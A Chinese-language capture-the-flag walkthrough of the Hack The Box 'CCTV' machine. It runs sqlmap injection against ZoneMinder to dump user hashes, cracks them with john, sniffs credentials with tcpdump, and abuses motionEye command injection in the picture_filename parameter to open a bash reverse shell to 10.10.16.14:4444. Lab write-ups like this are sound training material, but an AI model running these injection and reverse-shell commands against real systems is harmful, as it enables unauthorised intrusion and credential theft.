【渗透测试】HTB Season 10 CCTV 全过程WP
CCTV
信息收集

admin/admin登录

zoneminder 是v1.37.63
CVE-2024-51482
https://github.com/Gh0s7Ops/CVE-2024-51482-Multi-Stage-Surveillance-System-Exploit
sqlmap -u "http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1" \
--cookie="ZMSESSID=r0lvc55s40cck2d3ofpj32msj2" \
-p tid --dbms=mysql --batch

我们获取用户的密码
sqlmap -u "http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1" \
--cookie="ZMSESSID=r0lvc55s40cck2d3ofpj32msj2" \
-p tid --dbms=mysql --batch -D zm -T Users -C "Username" --dump
破解mark的密码
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
mark:opensesame
登录ssh
ssh mark@10.129.253.78

横向移动
上传linpeas.sh进行内网横向移动
可以看到有个计划任务

可以看到他会使用用户sa_mark进行登录
那我们可以去抓包
/usr/bin/tcpdump -i any -A
权限提升

建立一个隧道转发
ssh -L 8765:127.0.0.1:8765 mark@10.129.253.78


motionEye Version 0.43.1b4
CVE-2025-60787
开启图片输出:
curl "http://127.0.0.1:7999/1/1config/set?picture_output=on"

反弹shell
http://127.0.0.1:7999/1/config/set?picture_filename=$(bash -c 'bash -i >& /dev/tcp/10.10.16.14/4444 0>&1')
curl "http://127.0.0.1:7999/1/config/set?picture_filename=%24%28bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.14%2F4444%200%3E%261%27%29"
发先没反弹过来
还要触发
motion服务
curl "http://127.0.0.1:7999/1/config/set?emulate_motion=on"


浙公网安备 33010602011771号